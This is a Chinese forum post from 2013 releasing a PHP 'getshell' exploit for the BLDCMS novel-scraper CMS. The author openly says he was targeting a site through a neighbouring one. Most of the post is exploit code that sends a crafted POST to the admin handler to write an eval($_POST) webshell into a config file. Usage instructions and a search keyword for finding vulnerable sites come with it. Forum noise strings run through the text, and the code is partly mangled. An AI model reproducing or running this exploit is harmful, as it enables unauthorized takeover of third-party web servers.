之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
4 l& E: D6 t2 E& l
5 G; o2 ~9 m: l3 I( ^1 X 8 `- p+ m4 M% @! [$ {; a
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 : ~1 ^) H& L6 X0 P
, C" b1 _/ _; Z9 ]" n
既然都有人发了 我就把我之前写好的EXP放出来吧& O7 y5 Z5 d7 n( l% |- i) S g( x
" G& I7 @1 d2 C
view source print?01.php;">' E! |; n2 W/ u
02.<!--?php
2 R: Y( L9 d1 [4 R03.echo "-------------------------------------------------------------------
3 s$ W8 L) H& J7 B. g04. 6 e2 ]2 H [5 T
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
( J3 P* J0 B6 l, e& S06.
' p/ H8 ]5 p4 M, p2 @07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun: s( k0 `- B; h) Z1 S8 Q
08.
) X: g/ e; }) i; x$ b09.QQ:981009941\r\n 2013.3.21\r\n $ Y: N( U6 z4 V
10.
! H# S$ F. s$ c1 e$ ]' a11. 5 b) r0 i5 ?/ O% E
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码8 Y% P( B1 x! b; f- y/ r
13. ) j. j& R" I4 H6 L" R; f
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
# W( [8 O+ Y: z8 C15. * E5 j( d+ \+ W) o/ M: y) r
16.--------------------------------------------------------------------\r\n";5 }) g9 G7 G# G* R) D0 C s
17.$url=$argv[1];5 |' ?8 f( r/ z5 M
18.$dir=$argv[2];
3 j' |8 k; f/ ^; W% M19.$pass=$argv[3];4 E5 n3 q" Z2 X0 [3 t- ]
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
" J5 }/ y, l2 ^1 k21.if (emptyempty($pass)||emptyempty($url))4 c, h9 Z- H6 d+ ]% G
22.{exit("请输入参数");}
& o( u7 d1 q% R5 G, Z1 c% v9 z5 Z4 |23.else
0 }2 i% s9 Q9 y5 v$ \24.{8 ~3 c! g. ~* L7 Z
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
8 f0 \$ L7 v k% n% R' c26.
" Z) ^2 i0 D* b) }% G27.al;
& \4 g+ }) r; f9 W28.$length = strlen($fuckdata);
+ ^& m2 z3 u( s/ i29.function getshell($url,$pass)
" c0 N$ o4 I, |( i/ b30.{
! F- o4 |. A% |5 g/ Y4 L31.global $url,$dir,$pass,$eval,$length,$fuckdata;
( f/ `( w9 I6 Q3 `; L. b; z32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
4 D3 E" x* G% H2 q33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";5 Z" l# z# I$ j0 n
34.$header .= "User-Agent: MSIE\r\n";
; l* ~7 W- O' \! z35.$header .= "Host:".$url."\r\n";/ A6 q. u9 L8 V" R) l2 \1 Y. c
36.$header .= "Content-Length: ".$length."\r\n";
+ f2 i8 e9 |& N7 I37.$header .= "Connection: Close\r\n";
4 A1 A O/ n, Q+ s5 q) Q38.$header .="\r\n";
/ d3 D7 }6 M/ e# b39.$header .= $fuckdata."\r\n\r\n";
3 N+ B/ O2 @& O: ?% K' q1 L% g4 \40.$fp = fsockopen($url, 80,$errno,$errstr,15);9 W0 d ^2 M( { s- O
41.if (!$fp)7 |# Y& D+ ~6 v/ L. d E) Q
42.{
& ` h) C8 X; j) q43.exit ("利用失败:请检查指定目标是否能正常打开");% w! j" m9 H* O4 [) K% a0 b5 O
44.}$ j0 Q& I9 a9 S, K
45.else{ if (!fputs($fp,$header)), q; {! i% l9 t) s# y( [
46.{exit ("利用失败");}: |; ^7 B+ e6 t# H
47.else
) T; a$ D# }6 e0 Y q% _48.{
5 B3 t$ e1 \4 C! R6 w49.$receive = '';
" m6 ~( K6 r: J: j50.while (!feof($fp)) {9 j: f2 R9 Q5 t, s
51.$receive .= @fgets($fp, 1000);" J4 ^- q4 r% D! C5 l. M0 w5 {
52.}8 `" o1 D$ k, o& U- K; e5 u/ p
53.@fclose($fp);. h. S% o. P$ o
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
6 H% o9 H8 q% m3 K. p5 ]/ {, Q55.
7 d+ D9 r+ O+ W0 O0 j56.GPC是否=off)";
. D; K2 D6 R9 z: J57.}}6 b8 T; D# M1 u5 ?; u: l% D
58.}9 d. v6 j+ c6 W
59.}) @$ F. n) \& L1 n( Y
60.getshell($url,$pass);
2 A3 s' ~2 H! a$ n0 Z61.?-->
) c9 n/ s: i# t h4 ~' v$ c " e7 I0 A r- H
* m/ k! z4 J6 k; E7 P
4 F- p1 w5 a+ E" Y1 f
by 数据流
% o; ~) H+ X( I+ m3 ?2 `# ^ |
发表于 2013-3-26 20:49:10
收藏
支持
反对